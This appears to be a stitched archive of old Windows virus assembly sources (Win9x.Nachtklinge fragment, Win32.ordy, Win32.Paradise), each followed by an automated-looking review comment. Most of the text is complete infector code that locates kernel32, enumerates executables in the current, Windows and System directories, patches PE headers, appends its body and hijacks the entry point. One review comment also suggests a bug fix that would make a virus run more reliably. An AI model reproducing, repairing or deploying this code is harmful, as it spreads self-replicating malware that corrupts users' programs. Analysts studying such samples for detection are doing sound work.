exestring db "*.exe",0
dirstring db "*.*",0
filesize dd 0
old_entry dd 0
file_alignment dd 0
section_counter dw 0
old_section_size dd 0
old_raw_size dd 0
old_entry_save dd 0
db "Win9x.Nachtklinge coded by BeLiAL/bcvg"
stackshit dd 0
directorybuffer db 256 dup (1)
thedrive db "c:\",0
dotdot db "..",0
infection_counter db 0
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
lastwrite FILETIME <>
lastaccess FILETIME <>
creationtime FILETIME <>
db "Follow the Black Cat"
virusend label near
end start
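Review bot: In the findnextdir loop the third name check, `cmp word ptr [FindFileData.cFileName],002eh`, omits the `ebp+` delta that every neighbouring access uses, so once the code runs relocated inside a host (ebp != 0) it reads the unrelocated address rather than the find-data buffer; it should be `cmp word ptr [ebp+FindFileData.cFileName],002eh`, and it is a plausible source of the crashes the header comment mentions. The virtual-size patch `add dword ptr [edx+8h],ebx` adds ebx (old size + virussize) onto a field that already holds the old size, so the section's VirtualSize ends up as twice the old size plus virussize, which does not match the SizeOfRawData computed just below. locate_kernel steps down in 64 KB increments from the return address until it sees 'MZ' with no lower bound and no exception handler, so any unmapped page below the caller faults the process. A comment above InfectCurrentDir naming the infection marker (`';;'` written at MZ offset 38h), the code/executable/writable characteristics forced onto the last section, and the entry point moved into that section would make the sample's detection indicators explicit instead of having to be reconstructed from the patch sequence.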
+428
@@ -0,0 +1,428 @@
comment "
Win32.ordy by mort[MATRiX]
- simple direct action current dir last section PE appender
- using ordinal API values to access API
Well, in viriis there's mostly use some stuff to find APIs no matter
of kernel32.dll type,... I use APIs' ordinal values to access APIs.
API's address is counted right before it's used,...
When i searched for this values in different versions of widows,
i found they differ, so i included all ord values i was able to find.
U find them in ord.zip file in tools section.
I cant test thiss virii on all windoze versions. This one seems to be
good under win2k, anyway if u wanna run it under another, recheck
API's count,...
greetz All who helped me to create ordinal log
MiCr0s0fT - i founded my CreateFileA API DF sensitive,...
r there more? :)))
"
.486
.model flat,stdcall
extrn ExitProcess : proc
extrn MessageBoxA : proc
filetime struc
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
filetime ends
fileSearch struc
FileAttributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName db 0260h dup(?)
AlternateFileName db 13 dup(?)
db 3 dup(?)
fileSearch ends
_vSize = ((@retAdd - @ordy) / 0200h + 1) * 0200h
_DEBUG = 0
.data
dd ?
.code
@ordy:
mov eax,@retAdd - @ordy
push offset @retAdd
_retAddress equ $ - 4
pushad
call @SEH
add esp,8
mov esp,[esp]
pop dword ptr fs:[0]
pop eax
popad
ret
if _DEBUG
db 01000h dup(0) ;coz of debug symbols,...:(
endif
@SEH:
push dword ptr fs:[0]
mov dword ptr fs:[0],esp
xor eax,eax
call @findKernel
@delta label
mov ebp,[esp - 4] ;get delta handle
mov [ebp + _kBase - @delta],eax
mov ebx,eax ;get kernel values,...
add eax,dword ptr [eax + 03ch]
add eax,078h
mov eax,[eax]
add eax,ebx
add eax,018h
xchg eax,esi
lodsd
push eax
lodsd
add eax,ebx
mov [ebp + _addBase - @delta],eax
pop eax
lea edi,[ebp + _ordinals - @delta - (_ordEnd - _ordStart - 2)]
@nextOrdinal:
add edi,(_ordEnd - _ordStart) - 2
scasw
jnz @nextOrdinal
mov [ebp + _ordinalBase - @delta],edi
push 02000h
push 040h
mov eax,_GlobalAlloc
call @callAPI
push eax ;for GlobalFree
push eax
call @mask
db '*.*',0
@mask:
mov eax,_FindFirstFileA
call @callAPI
xchg eax,esi
@examine:
mov eax,[esp]
mov al,byte ptr [eax + FileAttributes]
and al,010h
cmp al,010h
jnz @fileFounded
@nextFile:
push dword ptr [esp]
push esi
mov eax,_FindNextFileA
call @callAPI
dec eax
jz @examine
mov eax,_GlobalFree
call @callAPI
xor eax,eax
sub eax,[esp + 030h] ;cause exception
@findKernel:
add eax,[esp + 030h]
and eax,0fffff000h
@nextPage:
sub eax,01000h
cmp word ptr [eax],'ZM'
jnz @nextPage
ret
;------------------------------------------------------------------------
@rw:
; edi - file handle
; eax - ReadFile/WriteFile
; edx - buffer
; ecx - size
pushad
push 0
call @fw
dd ?
@fw:
push ecx edx edi
call @callAPI
popad
ret
;------------------------------------------------------------------------
@fileFounded:
if _DEBUG
mov eax,[esp]
cmp dword ptr [eax + FileName],'SOHG'
jz @oki
jmp @nextFile
@oki:
endif
mov ebx,[esp]
mov eax,[ebx + FileSizeLow]
cmp eax,04000h
jb @nextFile
mov eax,dword ptr [ebx + FileName]
and dword ptr [ebx + LastWriteTime],eax
jz @nextFile
or dword ptr [ebx + LastWriteTime],eax
mov edx,_ReadFile
xchg eax,ebx
add eax,01000h
xchg eax,edx
call @openRW
push edx
push edi
mov eax,_CloseHandle
call @callAPI
pop edx
cld
mov edi,edx
mov eax,'EPZM'
scasw
jnz @nextFile
shr eax,010h
std
add edi,dword ptr [edi + 03ah]
scasw
scasw
jnz @nextFile
mov eax,[edi + 076h]
shl eax,3
add eax,052h
xchg eax,ebx
movzx eax,word ptr [edi + 8]
imul eax,028h
xadd ebx,eax
mov eax,_vSize
add [edi + 052h],eax ;add imagesize
xadd [ebx + edi + 010h],eax ;eax - old size
push eax
add eax,[ebx + edi + 014h] ;add phys. offset
mov [ebp + _virBodyPofs - @delta],eax
pop eax
add eax,[ebx + edi + 0ch]
xchg eax,[edi + 02ah] ;set/get entrypoint
add eax,[edi + 036h]
mov [ebp + _retAddress - @delta],eax ;set it,...
add dword ptr [ebx + edi + 08h],01000h ;add virtual size
or dword ptr [ebx + edi + 024h],0a0000020h
lea eax,[ebp + @finalInfection - @delta]
push eax
mov eax,_WriteFile
@openRW:
mov ecx,01000h
cld ;coz of CreateFileA DF sensitivity,...:)))
call @open
call @rw
ret
;------------------------------------------------------------------------
@setA:
push ebx
push eax
mov eax,_SetFileAttributesA
call @callAPI
ret
;-----------------------------------------------------------------------
_CloseHandle = 0 ;API handles
_CreateFileA = 2
_GlobalAlloc = 4
_GlobalFree = 6
_WriteFile = 8
_ReadFile = 0ah
_FindFirstFileA = 0ch
_FindNextFileA = 0eh
_SetEndOfFile = 010h
_SetFileTime = 012h
_SetFileAttributesA = 014h
_ordSize equ _ordEnd - _ordStart
;shl 2
_ordinals label
_ordStart label
_ordinals95 label
dw 0682 ;APIs num
dw 088h * 4 ;CloseHandle
dw 09dh * 4 ;CreateFileA
dw 01b5h * 4 ;GlobalAlloc
dw 01bch * 4 ;GlobalFree
dw 02e3h * 4 ;WriteFile
dw 0242h * 4 ;ReadFile
dw 0f9h * 4 ;FindFirstFileA
dw 0fch * 4 ;FindNextFile
dw 0281h * 4 ;SetEndOfFile
dw 028bh * 4 ;SetFileTime
dw 0288h * 4 ;SetFileAttributesA
_ordEnd label
_ordinals98 label ;(r1,SE)
dw 0745 ;APIs num
dw 09fh * 4 ;CloseHandle
dw 0b8h * 4 ;CreateFileA
dw 01e5h * 4 ;GlobalAlloc
dw 01ech * 4 ;GlobalFree
dw 0335h * 4 ;WriteFile
dw 027dh * 4 ;ReadFile
dw 011bh * 4 ;FindFirstFileA
dw 0120h * 4 ;FindNextFile
dw 02c5h * 4 ;SetEndOfFile
dw 02cfh * 4 ;SetFileTime
dw 02cch * 4 ;SetFileAttributesA
_ordinalsNT label
dw 02a1h ;APIs num
dw 018h * 4 ;CloseHandle
dw 031h * 4 ;CreateFileA
dw 0155h * 4 ;GlobalAlloc
dw 015ch * 4 ;GlobalFree
dw 027bh * 4 ;WriteFile
dw 01d6h * 4 ;ReadFile
dw 082h * 4 ;FindFirstFileA
dw 087h * 4 ;FindNextFile
dw 0210h * 4 ;SetEndOfFile
dw 021ah * 4 ;SetFileTime
dw 0217h * 4 ;SetFileAttributesA
_ordinals2k label
dw 0337h ;APIs num
dw 01eh * 4 ;CloseHandle
dw 037h * 4 ;CreateFileA
dw 019ch * 4 ;GlobalAlloc
dw 01a3h * 4 ;GlobalFree
dw 030eh * 4 ;WriteFile
dw 023dh * 4 ;ReadFile
dw 0a3h * 4 ;FindFirstFileA
dw 0ach * 4 ;FindNextFile
dw 028ch * 4 ;SetEndOfFile
dw 0297h * 4 ;SetFileTime
dw 0293h * 4 ;SetFileAttributesA
;------------------------------------------------------------------------
@open:
;eax - filename
pushad
mov eax,[esp + 028h]
add eax,FileName
push 0 0 3 0 1
push 080000000h or 040000000h
push eax
mov ebx,020h
call @setA
mov eax,_CreateFileA
call @callAPI
mov [esp],eax ;handle to edi
popad
ret
;-------------------------------------------------------
;eax - API handle
@callAPI:
pop edi
add eax,012345678h
_ordinalBase equ $ - 4
movzx eax,word ptr [eax]
add eax,012345678h
_addBase equ $ - 4
mov eax,[eax]
add eax,012345678h
_kBase equ $ - 4
call eax
jmp edi
;----------------------------------------------------------------
@finalInfection:
mov eax,012345678h
_virBodyPofs equ $ - 4
sub eax,01000h
push eax
mov eax,_ReadFile
xor ecx,ecx
inc ecx
@nextByte2Seek:
call @rw
dec dword ptr [esp]
jnz @nextByte2Seek
pop eax
mov ecx,_vSize
lea edx,[ebp + @ordy - @delta]
add eax,_WriteFile
call @rw
push esi
push edi edi
mov eax,_SetEndOfFile
call @callAPI
mov ebx,[esp]
mov eax,[esp + 0ch]
add eax,LastWriteTime
push eax
sub eax,8
push eax
sub eax,8
push eax
push ebx
mov eax,_SetFileTime
call @callAPI
mov eax,_CloseHandle
call @callAPI
mov ebx,[esp + 4]
mov eax,[ebx + FileAttributes]
xchg eax,ebx
add eax,FileName
call @setA
pop esi ;restore search handle
@fuckFile:
jmp @nextFile
@retAdd:
push 0
call @title
db '.ordy by mort[MATRiX]',0
@title:
call @mess
db 'hey guys, CreateFileA API is DF sensitive!!! :)))',0
@mess:
push 0
call MessageBoxA
call ExitProcess,0
ret
end @ordy
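Review bot: The `comment "` block explains the ordinal lookup but never records the artifact the infection leaves on disk, which is the first thing a reader classifying samples from this archive needs: `@fileFounded` ORs the first dword of `FileName` into the low dword of `LastWriteTime` in the search record, and `@finalInfection` pushes that record's three timestamps back through `SetFileTime`, so the victim's last-write time is altered while no dedicated marker dword appears to be written into the PE header. The other persistent trace is the `_vSize`-rounded body appended to the last section, whose characteristics are widened with `or dword ptr [ebx + edi + 024h],0a0000020h`. Both deserve a line in the header comment, e.g. `artifact: LastWriteTime.low |= first 4 bytes of filename; last section grows by _vSize, flags |= 0a0000020h`, since the text currently only warns about rechecking the per-version API counts.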
+823
@@ -0,0 +1,823 @@
; [Win32.Paradise] - Bugfixed and improved version of Iced Earth
; Copyright (c) 1999 by Billy Belcebu/iKX
;
; ?????? Welcome to another Billy's production.
; ???? ??????? ??? Enjoy this new...
; ????????????????????
; ? ???????????????? ???
; ? ????????????? ?
; ??????? ?? ?????? ??? ??? ????? ??? ??? ?????? ??????
; ??????? ?? ?? ???? ? ??? ? ?? ?? ? ??? ? ??????? ???????
; ? ? ?? ? ? ??? ? ?? ?? ? ??? ? ??????? ??????? ???
; ?? ??????? ????? ??????? ??????? ??????? ???
; ?? ??? ??????? ??????? ??????? ??????? ?????? ????? ??????? ???????
; ??????????? ? ??? ? ? ??? ? ? ??? ? ? ??? ? ? ?? ?? ?? ?? ? ????? ? ?????
; ????? ?? ???? ? ????? ? ??? ? ? ? ??? ? ??? ? ? ??? ? ?? ?? ????? ? ? ?????
; ??? ??? ??? ??????? ??? ??? ??????? ????? ??????? ???????
;
; Virus Name : Paradise
; Virus Author : Billy Belcebu/iKX
; Origin : Spain
; Platform : Win32
; Target : PE files
; Compiling : TASM 5.0 and TLINK 5.0 should be used
; tasm32 /ml /m3 paradise,,;
; tlink32 /Tpe /aa /c /v paradise,paradise,,import32.lib,
; Notes : Not very innovative, just made for practice some things, as
; CRC32 GetAPI engine, and such like. The name comes from one
; of the best songs i've ever heard, and probably my favouri-
; te song of Stratovarius. Its lyrics are, sadly, an actual
; reality: we are killing the nature slowly and without any
; kind of mercy, thinking that we can make any use of every-
; thing around without any responsability...
; Greetings : It is very clear... to all the Stratovaius fans (specially
; to Int13h and Owl) and all the ecologist activists.
; Fucks : To everything related to the bullfights, the greatest act
; of the human barbarism with the animals, the spanish's
; national shame; and to all the acts that go againist the
; rights of the animals and/or the vegetables, as well as
; with the persons (goddamn fascisms!).
;
; Rojo, sangre
; un color muy nacional
; morbo, suerte
; sol y arena pide Dios
; arte, muerte
; sirve de alimento
; pase, valiente,
; y vuelta al ruedo!!!
; Cuando el acero me traspasa el corazon
; y se le llama fiesta
; y otra vuelta de tuerca
; cuando el sadismo se convierte en tradicion
; y la faena en gesta
; y nadie se molesta
; -Reincidentes-
;
.586p
.model flat
; ??----?????? ?
; : Paradise virus - Data, macros and such like shit :
; ? ??????---???
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
virus_size equ (offset virus_end-offset virus_start)
heap_size equ (offset heap_end-offset heap_start)
total_size equ virus_size+heap_size
shit_size equ (offset delta-offset Paradise)
section_flags equ 00000020h or 20000000h or 80000000h
temp_attributes equ 00000080h
n_infections equ 04h
mark equ 04Ch
; Only hardcoded for 1st generation, don't worry ;)
kernel_ equ 0BFF70000h
kernel_wNT equ 077F00000h
; Interesting macros for my code
cmp_ macro reg,joff1 ; Optimized version of
inc reg ; CMP reg,0FFFFFFFFh
jz joff1 ; JZ joff1
dec reg ; The code is reduced in 3
endm ; bytes (7-4)
apicall macro apioff ; Optimize muthafucka!
call dword ptr [ebp+apioff]
endm
.data
szTitle db "Paradise v1.00",0
szMessage db "Paradise - Visions - Stratovarius",10
db "Virus size............"
db virus_size/1000 mod 10 + "0"
db virus_size/0100 mod 10 + "0"
db virus_size/0010 mod 10 + "0"
db virus_size/0001 mod 10 + "0"
db " bytes",0
db "Copyright (c) 1999 by Billy Belcebu/iKX",0
.code
; ??----?????? ?
; : Paradise virus - Virus startz here :
; ? ??????---???
virus_start label byte
Paradise:
pushad ; Push all da shit
pushfd
call delta_ ; Hardest code to undestand ;)
delta: db "[iKX4EVER" ; Yeah... iKX :)
delta_: pop ebp
mov eax,ebp
sub ebp,offset delta
sub eax,shit_size ; Obtain at runtime the
sub eax,00001000h ; imagebase of the process
NewEIP equ $-4
mov dword ptr [ebp+ModBase],eax
call ChangeSEH ; SEH rlz :)
mov esp,[esp+08h]
jmp RestoreSEH
ChangeSEH:
xor ebx,ebx
push dword ptr fs:[ebx]
mov fs:[ebx],esp
mov esi,[esp+2Ch] ; Get program return address
and esi,0FFFF0000h ; Align to page
mov ecx,5
call GetK32
mov dword ptr [ebp+kernel],eax ; EAX must be K32 base address
lea esi,[ebp+@@NamezCRC32]
lea edi,[ebp+@@Offsetz]
call GetAPIs ; Retrieve all APIs
call PrepareInfection
call InfectItAll
call payload
or ebp,ebp ; Is 1st gen?
jz fakehost
RestoreSEH:
xor ebx,ebx
pop dword ptr fs:[ebx]
pop eax
popfd
popad
mov ebx,12345678h
org $-4
OldEIP dd 00001000h
add ebx,12345678h
org $-4
ModBase dd 00400000h
push ebx
ret
; ??----?????? ?
; : Paradise virus - Retrieve directories to infect :
; ? ??????---???
PrepareInfection:
lea edi,[ebp+WindowsDir]
push 7Fh
push edi
apicall _GetWindowsDirectoryA
add edi,7Fh
push 7Fh
push edi
apicall _GetSystemDirectoryA
add edi,7Fh
push edi
push 7Fh
apicall _GetCurrentDirectoryA
ret
; ??----?????? ?
; : Paradise virus - Infect windows, windows\system and the current dir :
; ? ??????---???
InfectItAll:
lea edi,[ebp+directories]
mov byte ptr [ebp+mirrormirror],dirs2inf
requiem:
push edi
apicall _SetCurrentDirectoryA
push edi
call Infect
pop edi
add edi,7Fh
dec byte ptr [ebp+mirrormirror]
cmp byte ptr [ebp+mirrormirror],00h
jnz requiem
ret
; ??----?????? ?
; : Paradise virus - Searching... Seek and infect! :
; ? ??????---???
Infect: and dword ptr [ebp+infections],00000000h ; reset countah
lea eax,[ebp+offset WIN32_FIND_DATA] ; Find's shit
push eax
lea eax,[ebp+offset EXE_MASK]
push eax
apicall _FindFirstFileA
cmp_ eax,FailInfect
mov dword ptr [ebp+SearchHandle],eax
__1: push dword ptr [ebp+ModBase]
push dword ptr [ebp+OldEIP]
push dword ptr [ebp+NewEIP]
call Infection
pop dword ptr [ebp+NewEIP]
pop dword ptr [ebp+OldEIP]
pop dword ptr [ebp+ModBase]
inc byte ptr [ebp+infections]
cmp byte ptr [ebp+infections],n_infections
jz FailInfect
__2: lea edi,[ebp+WFD_szFileName]
mov ecx,MAX_PATH
xor al,al
rep stosb
lea eax,[ebp+offset WIN32_FIND_DATA]
push eax
push dword ptr [ebp+SearchHandle]
apicall _FindNextFileA
or eax,eax
jz CloseSearchHandle
jmp __1
CloseSearchHandle:
push dword ptr [ebp+SearchHandle]
apicall _FindClose
FailInfect:
ret
; ??----?????? ?
; : Paradise virus - Infect found file :
; ? ??????---???
Infection:
lea esi,[ebp+WFD_szFileName] ; Get FileName to infect
push 80h
push esi
apicall _SetFileAttributesA ; Wipe its attributes
call OpenFile ; Open it
cmp_ eax,CantOpen
mov dword ptr [ebp+FileHandle],eax
mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; 1st we create map with
call CreateMap ; its exact size
cmp_ eax,CloseFile
mov dword ptr [ebp+MapHandle],eax
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
call MapFile ; Map it
cmp_ eax,UnMapFile
mov dword ptr [ebp+MapAddress],eax
mov esi,eax ; Get PE Header
mov esi,[esi+3Ch]
add esi,eax
cmp dword ptr [esi],"EP" ; Is it PE?
jnz NoInfect
cmp dword ptr [esi+mark],"SDRP" ; Was it infected?
jz NoInfect
push dword ptr [esi+3Ch]
push dword ptr [ebp+MapAddress] ; Close all
apicall _UnmapViewOfFile
push dword ptr [ebp+MapHandle]
apicall _CloseHandle
pop ecx
mov eax,dword ptr [ebp+WFD_nFileSizeLow] ; And Map all again.
add eax,virus_size
call Align
xchg ecx,eax
call CreateMap
cmp_ eax,CloseFile
mov dword ptr [ebp+MapHandle],eax
mov ecx,dword ptr [ebp+NewSize]
call MapFile
cmp_ eax,UnMapFile
mov dword ptr [ebp+MapAddress],eax
mov esi,eax ; Get PE Header
mov esi,[esi+3Ch]
add esi,eax
mov edi,esi
movzx eax,word ptr [edi+06h]
dec eax
imul eax,eax,28h
add esi,eax
add esi,78h
mov edx,[edi+74h]
shl edx,3
add esi,edx
mov eax,[edi+28h]
mov dword ptr [ebp+OldEIP],eax
mov edx,[esi+10h]
mov ebx,edx
add edx,[esi+14h]
push edx
mov eax,ebx
add eax,[esi+0Ch]
mov [edi+28h],eax
mov dword ptr [ebp+NewEIP],eax
mov eax,[esi+10h]
add eax,virus_size
mov ecx,[edi+3Ch]
call Align
mov [esi+10h],eax
mov [esi+08h],eax
pop edx
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edi+50h],eax
or dword ptr [esi+24h],section_flags
mov dword ptr [edi+mark],"SDRP"
lea esi,[ebp+Paradise]
xchg edi,edx
add edi,dword ptr [ebp+MapAddress]
mov ecx,virus_size
rep movsb
jmp UnMapFile
NoInfect:
dec byte ptr [ebp+infections]
mov ecx,dword ptr [ebp+WFD_nFileSizeLow]
call TruncFile
UnMapFile:
push dword ptr [ebp+MapAddress]
apicall _UnmapViewOfFile
CloseMap:
push dword ptr [ebp+MapHandle]
apicall _CloseHandle
CloseFile:
push dword ptr [ebp+FileHandle]
apicall _CloseHandle
CantOpen:
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax,[ebp+WFD_szFileName]
push eax
apicall _SetFileAttributesA
ret
; ??----?????? ?
; : Paradise virus - Get KERNEL32.DLL base address (simplest method) :
; ? ??????---???
GetK32 proc
_@1: jecxz WeFailed
cmp word ptr [esi],"ZM"
jz CheckPE
_@2: sub esi,10000h
dec ecx
jmp _@1
CheckPE:
mov edi,[esi+3Ch]
add edi,esi
cmp dword ptr [edi],"EP"
jz WeGotK32
jmp _@2
WeFailed:
mov ecx,cs
xor cl,cl
jecxz WeAreInWNT
mov esi,kernel_
jmp WeGotK32
WeAreInWNT:
mov esi,kernel_wNT
WeGotK32:
xchg eax,esi
ret
GetK32 endp
; ??----?????? ?
; : Paradise virus - Get all API addresses :
; ? ??????---???
GetAPIs proc
@@1: lodsd ; Get in EAX the CRC32 of API
push esi
push edi
call GetAPI_ET_CRC32
pop edi
pop esi
stosd ; Save in [EDI] the API address
cmp byte ptr [esi],0BBh ; Last API?
jz @@4 ; Yeah, get outta here
jmp @@1 ; Nein, loop again
@@4: ret
GetAPIs endp
GetAPI_ET_CRC32 proc
xor edx,edx
xchg eax,edx ; Put CRC32 of da api in EDX
mov word ptr [ebp+Counter],ax ; Reset counter
mov esi,3Ch
add esi,[ebp+kernel] ; Get PE header of KERNEL32
lodsw
add eax,[ebp+kernel] ; Normalize
mov esi,[eax+78h] ; Get a pointer to its
add esi,1Ch ; Export Table
add esi,[ebp+kernel]
lea edi,[ebp+AddressTableVA] ; Pointer to the address table
lodsd ; Get AddressTable value
add eax,[ebp+kernel] ; Normalize
stosd ; And store in its variable
lodsd ; Get NameTable value
add eax,[ebp+kernel] ; Normalize
push eax ; Put it in stack
stosd ; Store in its variable
lodsd ; Get OrdinalTable value
add eax,[ebp+kernel] ; Normalize
stosd ; Store
pop esi ; ESI = NameTable VA
@?_3: push esi ; Save again
lodsd ; Get pointer to an API name
add eax,[ebp+kernel] ; Normalize
xchg edi,eax ; Store ptr in EDI
mov ebx,edi ; And in EBX
push edi ; Save EDI
xor al,al ; Reach the null character
scasb ; that marks us the end of
jnz $-1 ; the api name
pop esi ; ESI = Pointer to API Name
sub edi,ebx ; EDI = API Name size
push edx ; Save API's CRC32
call CRC32 ; Get actual api's CRC32
pop edx ; Restore API's CRC32
cmp edx,eax ; Are them equal?
jz @?_4 ; if yes, we got it
pop esi ; Restore ptr to api name
add esi,4 ; Get the next
inc word ptr [ebp+Counter] ; And increase the counter
jmp @?_3 ; Get another api!
@?_4:
pop esi ; Remove shit from stack
movzx eax,word ptr [ebp+Counter] ; AX = Counter
shl eax,1 ; *2 (it's an array of words)
add eax,dword ptr [ebp+OrdinalTableVA] ; Normalize
xor esi,esi ; Clear ESI
xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0
lodsw ; Get ordinal in AX
shl eax,2 ; And with it we go to the
add eax,dword ptr [ebp+AddressTableVA] ; AddressTable (array of
xchg esi,eax ; dwords)
lodsd ; Get Address of API RVA
add eax,[ebp+kernel] ; and normalize!! That's it!
ret
GetAPI_ET_CRC32 endp
; ??----?????? ?
; : Paradise virus - Some useful subroutines :
; ? ??????---???
Align proc
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret
Align endp
TruncFile proc
xor eax,eax
push eax
push eax
push ecx
push dword ptr [ebp+FileHandle]
apicall _SetFilePointer
push dword ptr [ebp+FileHandle]
apicall _SetEndOfFile
ret
TruncFile endp
OpenFile proc
xor eax,eax
push eax
push eax
push 00000003h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi
apicall _CreateFileA
ret
OpenFile endp
CreateMap proc
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
apicall _CreateFileMappingA
ret
CreateMap endp
MapFile proc
xor eax,eax
push ecx
push eax
push eax
push 00000002h
push dword ptr [ebp+MapHandle]
apicall _MapViewOfFile
ret
MapFile endp
CRC32 proc
cld
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi ; Another fool byte less
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
CRC32 endp
payload proc
lea eax,[ebp+SYSTEMTIME]
push eax
apicall _GetSystemTime
cmp word ptr [ebp+ST_wMonth],6 ; On the sixth month...
jnz no_payload
cmp word ptr [ebp+ST_wDay],6 ; On the sixth day...
jnz no_payload
lea eax,[ebp+szUSER32]
push eax
apicall _LoadLibraryA
call @?_1
db "MessageBoxA",0
@?_1: push eax
apicall _GetProcAddress
push 00001000h
lea ebx,[ebp+mark_]
push ebx
lea ebx,[ebp+song]
push ebx
push 00000000h
call eax
no_payload:
ret
payload endp
; ??----?????? ?
; : Paradise virus - Virus data :
; ? ??????---???
mark_ db "[Win32.Paradise v1.00]",0
song db "Late at night i found myself again",10
db "wondering and watching TV",10
db "I can't believe what's on the screen",10
db "something that i wouldn't like to see",10
db "Many rare species will perish soon",10
db "and we'll be short on food",10
db "Why do we have to be so selfish",10
db "we have to change our attitude",10
db "I know that i am not",10
db "the only one that's worried",10
db "Why don't we all",10
db "wake up, and and realize",10
db "Like the birds in the sky",10
db "we are flying so high",10
db "without making anykind of sacrifice",10
db "We've got so little time",10
db "to undo this crime",10
db "or we'll lose our paradise",10
db "It seems to me that there's no sense at all",10
db "nobody cares, it's always the same",10
db "Mother nature's crying out in pain",10
db "I know we are the ones to blame",10,10
db "Paradise [ Stratovarius ]",0
db "Copyright (c) 1999 by Billy Belcebu/iKX",0
EXE_MASK db "*.EXE",0
szUSER32 db "USER32",0
@@NamezCRC32 label byte
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@DeleteFileA dd 0DE256FDEh
@SetFilePointer dd 085859D42h
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetProcAddress dd 0FFC97C1Fh
@LoadLibraryA dd 04134D1ADh
@GetSystemTime dd 075B7EBE8h
db 0BBh
align dword
virus_end label byte
heap_start label byte
kernel dd kernel_
infections dd 00000000h
NewSize dd 00000000h
SearchHandle dd 00000000h
FileHandle dd 00000000h
MapHandle dd 00000000h
MapAddress dd 00000000h
AddressTableVA dd 00000000h
NameTableVA dd 00000000h
OrdinalTableVA dd 00000000h
Counter dw 0000h
@@Offsetz label byte
_FindFirstFileA dd 00000000h
_FindNextFileA dd 00000000h
_FindClose dd 00000000h
_CreateFileA dd 00000000h
_DeleteFileA dd 00000000h
_SetFilePointer dd 00000000h
_SetFileAttributesA dd 00000000h
_CloseHandle dd 00000000h
_GetCurrentDirectoryA dd 00000000h
_SetCurrentDirectoryA dd 00000000h
_GetWindowsDirectoryA dd 00000000h
_GetSystemDirectoryA dd 00000000h
_CreateFileMappingA dd 00000000h
_MapViewOfFile dd 00000000h
_UnmapViewOfFile dd 00000000h
_SetEndOfFile dd 00000000h
_GetProcAddress dd 00000000h
_LoadLibraryA dd 00000000h
_GetSystemTime dd 00000000h
MAX_PATH equ 260
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db MAX_PATH dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
directories label byte
WindowsDir db 7Fh dup (00h)
SystemDir db 7Fh dup (00h)
OriginDir db 7Fh dup (00h)
dirs2inf equ (($-directories)/7Fh)
mirrormirror db dirs2inf
SYSTEMTIME label byte
ST_wYear dw ?
ST_wMonth dw ?
ST_wDayOfWeek dw ?
ST_wDay dw ?
ST_wHour dw ?
ST_wMinute dw ?
ST_wSecond dw ?
ST_wMilliseconds dw ?
heap_end label byte
fakehost:
pop dword ptr fs:[0]
pop eax
popfd
popad
xor eax,eax
push eax
push offset szTitle
push offset szMessage
push eax
call MessageBoxA
push 00000000h
call ExitProcess
end Paradise
; Komandos de autodefensa animal!
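Review bot: The header comment lists platform, target and build commands but not the marker the infection leaves, which is the detail an analyst reading this archive looks for first: `Infection` skips files where `cmp dword ptr [esi+mark],"SDRP"` matches and stamps `mov dword ptr [edi+mark],"SDRP"` into the PE header at `mark equ 04Ch`, so that dword is both the only re-infection guard and the most stable static indicator for the sample. The same block should record the environment assumption visible in `GetK32`, whose `WeFailed` path falls back to the hard-coded `kernel_`/`kernel_wNT` bases that the author's own comment limits to the first generation and that presumably only hold on the Win9x and NT kernel32 layouts the names imply. Two lines under `; Notes` would cover it, e.g. `; Marker : "SDRP" at PE header +4Ch (checked and written in Infection)` and `; Assumes : K32 fallback bases kernel_/kernel_wNT (1st generation only)`.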
